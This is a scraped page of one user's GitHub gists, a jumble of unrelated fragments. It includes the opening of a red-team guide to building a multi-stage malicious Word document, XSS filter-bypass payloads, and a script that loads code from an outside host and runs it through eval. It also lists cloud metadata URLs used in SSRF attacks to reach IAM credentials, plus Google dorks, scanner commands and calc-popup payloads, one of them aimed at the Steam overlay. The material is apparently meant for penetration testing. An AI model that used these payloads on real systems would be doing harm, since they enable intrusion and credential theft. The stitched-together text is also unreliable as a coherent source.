
@nani1337
nani1337 / muti-stage-1.md
Created January 15, 2019 14:05 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulting document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining the commands to be executed from the document's Author property and passing them to the StdIn of a Powershell.exe process
  • leveraging the certutil technique to receive a Base64-encoded malicious HTA document
  • having a Base64-encoded Powershell command in that Author property
java%0d%0ascript%0d%0a:alert(0)
(CRLF injection to bypass a blacklist on javascript:)
<svg%0donload=prompt(1)>
(in case svg onload= is filtered, the %0d acts as a separator and can sometimes confuse WAFs.) %0a %0c %09 %00 are also common payloads to use here.
<input onfocus=alert(0) autofocus>
If a dev has hard-coded a blacklist to "protect" from XSS, input is sometimes forgotten about!
\\"-alert(0);//
@nani1337
nani1337 / cloud_metadata.txt
Created September 15, 2018 21:37 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
site: site.com inurl:&
Useful for finding endpoints with parameters.
site: site.com inurl:login,register,upload,logout,redirect,redir,goto,admin etc.
For finding interesting endpoints
site: site.com ext:php,asp,aspx,jsp,jspa,txt,swf
To install Docker in Kali, these were the steps I followed:
Create a backports file and add the entry for Debian Wheezy:
echo 'deb http://http.debian.net/debian wheezy-backports main' > /etc/apt/sources.list.d/backports.list && apt-get update
Install ca-certificates and allow APT to operate via https:
apt-get install apt-transport-https ca-certificates
/root/Downloads/arachni-1.5.1-0.5.12/bin/arachni http://testfire.net/ --checks=xss* --output-verbose --report-save-path=/tmp/test.com.afr
jenkins
/root/Downloads/arachni-1.5.1-0.5.12/bin/arachni_reporter /tmp/test.com.afr --reporter=html:outfile=/tmp/my_report.html.zip
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ks.xss.ht");a.send();</script>
Step#1 (clean cache)
>sourceanalyzer -b xvwa -clean
Step#2 (translate source code to byte code)
>sourceanalyzer -Xmx2500M -Xms2500M -64 -verbose -b xvwa -cp **/*.jar **/*.php
Step#3 (scan with rulepack, custom rules, filters, etc)
>>sourceanalyzer -b xvwa -scan -f wvwa.fpr
#
#
from PIL import Image   # Pillow, for loading the image
import pytesseract      # Python wrapper around the Tesseract OCR engine

# Open the image file and run OCR over it, returning the recognised text
image = Image.open('2.jpg')
orange = pytesseract.image_to_string(image)
print(orange)
# Recording the preparation process is very troublesome.
@nani1337
nani1337 / calc pop up in .html
Last active October 9, 2019 05:06
Calc in HTML5
<a href="calculator:">calculator:</a> (regular link)
<br /><br />
<input type="button" onclick="location.href = 'calculator:'" value="location.href = 'calculator:'" /> (button using location.href)
<br /><br />
<input type="button" onclick="setTimeout('location.href = \'calculator:\'')" value="setTimeout('location.href = \'calculator:\'')" /> (setTimeout/location.href, requires confirmation)
sm_testkick <a onmouseover="javascript:SteamOverlayAPI.OpenExternalBrowserURL('file://C:/Windows/System32/calc.exe')">The remote host stopped receiving communications and closed the connection</a>